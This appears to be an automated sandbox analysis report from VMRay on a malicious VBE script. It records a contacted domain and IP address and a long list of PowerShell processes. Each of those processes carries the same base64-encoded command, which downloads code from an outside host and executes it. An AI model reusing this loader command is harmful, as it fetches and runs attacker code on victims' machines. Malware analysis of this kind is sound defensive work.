VMRay Analyzer Report for Sample #632978
VMRay Analyzer
3.0.1
URI
zaratoons.info
Resolved_To
Address
212.73.150.207
Process
1
2880
cscript.exe
1116
cscript.exe
"C:\Windows\System32\CScript.exe" "C:\Users\5P5NRG~1\Desktop\dokumentacja_92622.vbe"
C:\Windows\system32\
c:\windows\system32\cscript.exe
Process
3
1960
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
4
2060
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
5
2052
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
6
1416
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
7
1972
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
8
1868
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
9
200
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
10
1204
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
11
2436
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
12
2336
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
13
2548
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
14
2556
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
15
2620
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
16
2192
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
17
2428
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
18
1560
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
19
1444
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
20
2140
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
21
1600
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
22
1276
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
23
944
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
24
2736
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
25
2804
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
26
2816
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
27
1460
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
28
516
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
29
1676
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
30
2280
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
31
2456
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
32
2540
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
33
804
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
34
1332
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
35
688
powershell.exe
2880
powershell.exe
